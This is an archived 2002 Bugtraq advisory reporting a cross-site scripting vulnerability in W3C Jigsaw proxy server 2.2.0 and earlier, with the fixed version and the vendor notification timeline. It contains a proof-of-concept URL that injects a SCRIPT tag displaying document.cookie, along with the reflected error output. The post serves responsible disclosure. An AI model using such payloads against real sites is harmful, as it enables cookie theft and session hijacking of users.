[26734] in bugtraq
W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST)
daemon@ATHENA.MIT.EDU (TAKAGI, Hiromitsu)
Mon Aug 19 18:51:16 2002
Date: Sun, 18 Aug 2002 04:10:45 +0900
From: "TAKAGI, Hiromitsu" <takagi.hiromitsu@aist.go.jp>
To: BUGTRAQ@securityfocus.com
Message-Id: <20020818032022.DBE1.TAKAGI.HIROMITSU@aist.go.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 8bit
W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability
===========================================================
Affected:
Jigsaw 2.2.0 and earlier
http://www.w3.org/Jigsaw/RelNotes.html#2.2.0
Fixed:
Jigsaw 2.2.1
http://www.w3.org/Jigsaw/RelNotes.html#2.2.1
Exploit:
http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>
========================================================
An HTTP error occured while getting: <p>
<strong>http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT></strong><p>
Details "The host name [nonexistenthost.google.com] couldn't be resolved.
Details: "nonexistenthost.google.com"".<hr>Generated by
<i>http://.............:8001/
...snip...
========================================================
Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.
<http://www.securityfocus.com/bid/3087>
<http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
<http://www.securityfocus.com/archive/1/197606>
Vendor Status:
Aug 10, 2001: Notified
Jan 4, 2002: Responded
Apr 8, 2002: Fix released
Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/
